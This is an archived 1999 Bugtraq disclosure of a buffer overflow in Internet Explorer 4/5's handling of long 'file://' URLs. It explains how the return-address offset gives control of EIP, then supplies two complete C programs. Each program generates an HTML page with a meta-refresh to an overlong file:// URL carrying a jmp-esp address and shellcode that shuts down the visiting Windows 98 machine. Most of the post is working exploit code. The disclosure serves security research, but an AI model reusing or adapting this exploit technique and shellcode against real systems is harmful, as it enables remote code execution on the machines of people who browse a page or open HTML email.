[12488] in bugtraq
IE4/5 "file://" buffer overflow
daemon@ATHENA.MIT.EDU (UNYUN)
Tue Nov 9 11:40:02 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <382736261D6.CF3ASHADOWPENGUIN@fox.nightland.net>
Date: Tue, 9 Nov 1999 05:44:22 +0900
Reply-To: UNYUN <shadowpenguin@BACKSECTION.NET>
From: UNYUN <shadowpenguin@BACKSECTION.NET>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hello
Microsoft Internet Explorer 4/5 overflows when the handling of
"file://" specification. This overflow occurs when we are logging on to
the Microsft Network, this overflow can be verified if the long name is
specfied to the "file://". For example,
file://test/AAAAAAAAAAAA.... (long 'A')
This is most typical exploitable buffer overflow, because this overflow
overwrites the RET address and can control the EIP. If you try the
previously described example, you will be able to confirm "EIP 41414141H"
at the GPF dialog box. The RET is stored at 39H,40H,41H,42H from the
next of "file://".
This overflow contains the possibility of the virus and trojans infection,
sytsem destoruction, intorusion, and so on.
This overflow contains the possibility of the virus and trojans
infection, sytsem destruction, intrusion, and so on. If this overflow is
used by attacker, any codes will be sent to the visitors who browse the
exploting page, and the client host will be cracked. This overflow also
causes the problem on many kind of e-mail clients software. If the user
opens the HTML mail which contains the exploit code, the exploit code
will be executed, because many e-mail software uses the IE for the
browsing of HTML mail.
We coded the following sample codes. This codes generates the HTML file
that reboots the client PC. They are tested on Windows98 Japanese
Edition.
---
/*=============================================================================
Microsoft IE4 for Windows98 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <windows.h>
#define MAXBUF 1000
#define RETADR 53
unsigned int mems[]={
0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,0,0};
unsigned char exploit_code[200]={
0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
0xFF,0xD0,0x00,
};
unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
unsigned int adr;
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2){
adr=(unsigned int)p;
if ((adr&0xff)==0) continue;
if (((adr>>8)&0xff)==0) continue;
if (((adr>>16)&0xff)==0) continue;
if (((adr>>24)&0xff)==0) continue;
return(adr);
}
return(0);
}
main(int argc,char *argv[])
{
FILE *fp;
unsigned int i,ip;
unsigned char buf[MAXBUF];
if (argc<2){
printf("usage %s output_htmlfile\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
for (i=0;;i+=2){
if (mems[i]==0){
printf("Can not find jmp code.\n");
exit(1);
}
if ((ip=search_mem(fp,(unsigned char *)mems[i],
(unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
}
printf("Jumping address : %x\n",ip);
memset(buf,0x41,MAXBUF);
buf[RETADR-1]=0x90;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
memcpy(buf+80,exploit_code,strlen(exploit_code));
buf[MAXBUF]=0;
fprintf(fp,"%s/\">\n<HTML><B>",buf);
fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
fprintf(fp,"If you are using IE4 for Japanese Windows98, ");
fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
fprintf(fp,"</HTML>\n");
fclose(fp);
printf("%s created.\n",argv[1]);
return FALSE;
}
/*=========================================================================
Microsoft IE45 for Windows98 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=========================================================================
*/
#include <stdio.h>
#include <windows.h>
#define MAXBUF 1000
#define RETADR 53
/*
jmp esp (FF E4) code is stored in this area.
You must change this address for non-Japanese Windows98
*/
#define EIP 0xbfb75a35
unsigned char exploit_code[200]={
0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53,
0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3,
0x00
};
main(int argc,char *argv[])
{
FILE *fp;
unsigned int ip;
unsigned char buf[MAXBUF];
if (argc<2){
printf("usage %s output_htmlfile\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
memset(buf,0x41,MAXBUF);
ip=EIP;
buf[RETADR-1]=0x7f;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=( ip>>24)&0xff;
memcpy(buf+80,exploit_code,strlen(exploit_code));
buf[MAXBUF]=0;
fprintf(fp,"%s/\">\n<HTML><B>",buf);
fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
fprintf(fp,"If you are using IE5 for Japanese Windows98, ");
fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
fprintf(fp,"</HTML>\n");
fclose(fp);
printf("%s created.\n",argv[1]);
return FALSE;
}
-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
shadowpenguin@backsection.net (webmaster)
% eEye Digital Security Team [ http://www.eEye.com ]
unyun@eEye.com
